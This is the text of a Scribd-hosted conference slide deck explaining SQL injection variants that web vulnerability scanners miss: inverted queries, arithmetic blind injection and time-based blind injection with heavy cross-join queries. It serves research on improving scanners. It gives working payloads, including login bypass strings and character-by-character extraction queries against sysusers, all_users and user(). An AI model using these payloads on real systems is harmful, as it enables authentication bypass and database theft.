Scribd
Upload
35 views66 pages

How ?¿$ & Developers Defeat The Most Famous Web Vulnerability Scanners or How To Recognize Old Friends

This document discusses techniques for defeating web vulnerability scanners, including inverted queries, arithmetic blind SQL injection, and time-based blind SQL injection using heavy queries. It explains how these techniques can exploit vulnerabilities that scanners have trouble detecting. The document includes examples of exploiting each technique against different databases like SQL Server, Oracle, and MySQL. It also demonstrates a tool called Marathon Tool that automates time-based blind SQL injection attacks. The overall message is that modern exploits require improved automatic scanning to detect more sophisticated attacks.

Uploaded by

jfk
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
35 views66 pages

How ?¿$ & Developers Defeat The Most Famous Web Vulnerability Scanners or How To Recognize Old Friends

This document discusses techniques for defeating web vulnerability scanners, including inverted queries, arithmetic blind SQL injection, and time-based blind SQL injection using heavy queries. It explains how these techniques can exploit vulnerabilities that scanners have trouble detecting. The document includes examples of exploiting each technique against different databases like SQL Server, Oracle, and MySQL. It also demonstrates a tool called Marathon Tool that automates time-based blind SQL injection attacks. The overall message is that modern exploits require improved automatic scanning to detect more sophisticated attacks.

Uploaded by

jfk
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
You are on page 1/ 66

How ?

$& developers defeat


the most famous web
vulnerability scanners
or how to recognize old
friends

Chema Alonso
Informtica64
Jos Parada
Microsoft Ibrica

Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection
using Heavey Queries
5.- Conclusions

1.-Introduction

SQL Injection is still here


among us

Web Application Security


Consortium: Comparision
http://projects.webappsec.org/Web-Application-SecurityStatistics

12.186
sites
97.554
bugs

Need to Improve Automatic


Scanning
Not always a manual scanning is
possible
Time
Confidentiality
Money, money, money

Need to study new ways to recognize


old fashion vulnerabilities to improve
automatic scanning tools.

2.-Inverted
Queries

Homers, how are they?


Lazy
Bad trainined
Poor Experience in
security stuf
Dont like working
Dont like
computing
Dont like coding
Dont like you!

Flanders are Left-handed

Right

SELECT UID
FROM USERS
WHERE
NAME=V_NAME
AND
PASSWORD=V_PASS
W;

Wrong?

SELECT UID
FROM USERS
WHERE
V_NAME=NAME
AND
V_PASSW=PASSWO
RD

Login Inverted Query


Select uid
From users where v_name=name and
v_pass=password
http://www.web.com/login.php?
v_name=Robert&v_pass=Kubica or '1'='1
Select uid
From users where Robert=name and Kubica
or 1=1=password
FAIL

Login Inverted SQL Injection


an example
Select uid
From users where v_name=name and
v_pass=password
http://www.web.com/login.php?
v_name=Robert&v_pass== or 1=1 or
Kubica
Select uid
From users where Robert=name and = or
1=1 or Kubica=password
Success

Blind Attacks
Attacker injects code but cant access
directly to the data.
However this injection changes the
behavior of the web application.
Then the attacker looks for diferences
between true code injections (1=1) and
false code injections (1=2) in the
response pages to extract data.
Blind SQL Injection
Biind Xpath Injection
Blind LDAP Injection

Blind SQL Injection Attacks


Attacker injects:
True where clauses
False where clauses
Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2

Program doesnt return any visible data


from database or data in error messages.
The attacker cant see any data
extracted from the database.

Blind SQL Injection Attacks


Attacker analyzes the response pages
looking for diferences between TrueAnswer Page and False-Answer
Page:
Diferent hashes
Diferent html structure
Diferent patterns (keywords)
Diferent linear ASCII sums
Diferent behavior
By example: Response Time

Blind SQL Injection Attacks


If any diference exists, then:
Attacker can extract all information from
database
How? Using booleanization
MySQL:
Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
True-Answer Page or False-Answer Page?

MSSQL:
Program.php?id=1 and 100>(Select top 1
ASCII(Substring(name,1,1))) from sysusers)

Oracle:
Program.php?id=1 and 100>(Select
ASCII(Substr(username,1,1))) from all_users where
rownum<=1)

Blind Inverted Query


Select product
From products
Where v_value=id;
http://www.web.com/products.php?v_value=2
and 1=1
Select product
From products
Where 2 and 1=1=id;
-> FAIL

The MySQL Case


1 is True
1=1=1 ->True
1=1=(1+1-1)=abs(1)=1 -> True
2=2=2 ->False
-> 2=2 becomes True -> True=2
-> True is equals to 1 then 1=2 is False
Select product
From products
Where v_value=id;
http://www.web.com/products.php?v_value=1 and 1=1
Select product
From products
Where 1 and 1=1=id;
-> SUCCES (if there is a Id=1)

Web Scanner behaviors

Acunetix
Paros
AppScan
W3af
Wapiti
Proxy Strike

Acunetix & Homer

Acunetix & Flanders

AppScan & Homer

AppScan & Flanders

Paros & Homer

Paros & Flanders

W3af & Homer

W3af & Flanders

Wapiti & Homer

Wapiti & Flanders

Demo
W3af
Wapiti
Proxy Strike

Results
Normal

Inverted

MS SQL
MS SQL
MySQL
Server
MySQL
Server
Numer
Numer
Numer
Numer
ic
String
ic
String
ic
String
ic
String

Paros

AppScan

Acunetix

w3af

wapiti
Proxy
Strike

In the end
OUCH!!!

Thank God for keep me safe

Solutions?
Concat string injection
Arithmetic Blind SQL Injection
Time-Based Blind SQL injection
Delay Functions
Heavy queries

3.- Arithmetic

What about this queries?


How to detect/exploit this Blind SQLinjection
vulnerability?
The query forces the parameter to be numeric
SELECT field FROM table WHERE id=abs(param)
Ex:
Get Param(ID)
Select .. Where att1=abs(ID)
Select .. Where att2=k1-ID
Print response

Not AND or OR operators can be used.


Boolean logic needs to be created with math
operations

Arithmetic Blind SQL


Injection
Divide by zero (David Litchfield)
Id=A+(1/(ASCII(B)-C))
A-> Param value originally used in the query.
B -> Value we are searching for, e.g.:
Substring(passwd,1,1)
C-> Counter [0..255]

TRUE: When ASCII(B)=C, the DB will


generate a divide by zero exception.

Arithmetic Blind SQL


Injection

Sums and subtractions


Id=A+ASCII(B)-C

A-> Param value originally used in the query.


B -> Value we are searching for, e.g.:
Substring(passwd,1,1)
C-> Counter [0..255]

When ASCII(B)=C, then the response


page of id=A+ASCII(B)-C will be the
same as id=A

Arithmetic Blind SQL


Injection
Value type overflow
Id=A+((C/ASCII(B))*(K))
A-> Param value originally used in the query.
B -> Value we are searching for, e.g.:
Substring(passwd,1,1)
C-> Counter [0..255]
K-> Value that overflows the type defined for A
(e.g. if A is integer, then K=2^32)

When C/ASCII(B)==1, K*1 overflows the data


type

Demo:
Divide by zero
Sums and
subtractions
Integer overflow

Conclusions
Arithmetic Blind SQL Injection allows
to construct binary logic without
AND and OR.
detects bugs in this kind of queries
And also in Inverted queries in which a
numeric value is used

Almost none of the vulnerability


scanners are using this method

4.-Time-based Blind SQL


Injection using heavy
queries

Time-Based Blind SQL


Injection

In scenarios with no diferences between


True-Answer Page and False-Answer
Page, time delays can be used.
Injection forces a delay in the response
page when the condition injected is True.
- Delay functions:

SQL Server: waitfor


Oracle: dbms_lock.sleep
MySQL: sleep or Benchmark Function
Postgres: pg_sleep

Ex:
; if (exists(select * from users)) waitfor delay '0:0:5

Time-Based Blind SQL


What about DBsInjection
without delay functions,
i.e.:

Oracle connections

MS Access
DB2

without PL/SQL injection

Can we still perform an exploitation of TimeBased Blind SQL Injection Attacks?

Where-Clause execution
order
Select whatever
From whatever
Where condition1 and condition2
- Condition1 lasts 10 seconds
- Condition2 lasts 100 seconds
Which condition should be executed first?

The heavy condition first


Condition2 (100
sec)

Condition1 (10
sec)

Condition2 &
condition1

Response
Time

TRUE

FALSE

FALSE

110 sec

TRUE

TRUE

TRUE

110 sec

FALSE

Not evaluated

FALSE

100 sec

The light condition first


Condition1 (10
sec)

Condition2 (100
sec)

Condition1 &
condition2

Response
Time

TRUE

FALSE

FALSE

110 sec

TRUE

TRUE

TRUE

110 sec

FALSE

Not evaluated

FALSE

10 sec

Time-Based Blind SQL Injection


using Heavy Queries
Attacker can perform an exploitation
delaying the True-answer page using a
heavy query.
It depends on how the database engine
evaluates the where clauses in the query.
There are two types of database engines:
Databases without optimization process
Databases with optimization process

Time-Based Blind SQL Injection


using Heavy Queries
Attacker could inject a heavy Cross-Join condition
for delaying the response page in True-Injections.
The Cross-join injection must be heavier than the
other condition.
Attacker only have to know or to guess the name
of a table with select permission in the database.
Example in MSSQL:
Program.php?id=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3,
sysusers AS sys4, sysusers AS sys5, sysusers AS
sys6, sysusers AS sys7, sysusers AS sys8)>1 and
300>(select top 1 ascii(substring(name,1,1)) from
sysusers)

Default tables to construct a


heavy query
Microsoft SQL Server
sysusers

Oracle
all_users

MySQL (versin 5)
information_schema.columns

Microsoft Access
MSysAccessObjects (97 & 2000 versions)
MSysAccessStorage (2003 & 2007)
52

Default tables to construct a


heavy query
or whatever you can guess
Clients
Customers
News
Logins
Users
Providers
.Use your imagination

Ex 1: MS SQL Server

Query takes 14 seconds -> True-Answer

Ex 1: MS SQL Server

Query takes 1 second -> False-Answer

Ex 2: Oracle

Query Takes 22 seconds > True-Answer

Ex 2: Oracle

Query Takes 1 second > False-Answer

Ex 3: Access 2007

Query Takes 39 seconds > True-Answer

Ex 3: Access 2007

Query Takes 1 second > False-Answer

Marathon Tool
Automates Time-Based Blind SQL Injection
Attacks using Heavy Queries in SQL Server,
MySQL, MS Access and Oracle Databases.
Schema Extraction from known databases
Extract data using heavy queries not matter
in which database engine (without schema)
Developed in .NET
Source code available
http://www.codeplex.com/marathontool

Demo: Marathon Tool

5.Conclusions

The real world has plenty kinds


of developers

References
Inverted SQL queries (Spanish)
http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-deii.html
Arithemtic Blind SQL Injection (spanish)
http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sqlinjection-i-de-ii.html
Time-Based Blind SQL Injection Using heavy queries & Marathon
Tool
http://www.defcon.org/images/defcon-16/dc16-presentations/alonsoparada/defcon-16-alonso-parada-wp.pdf
Marathon Tool
http://www.codeplex.com/marathontool
Connection String Attacks (spanish)
http://www.slideshare.net/chemai64/connection-string-parameterpollution

Dont complain about your


job!!

Thanks!
Chema Alonso
([email protected])
Jos Parada
([email protected])

You might also like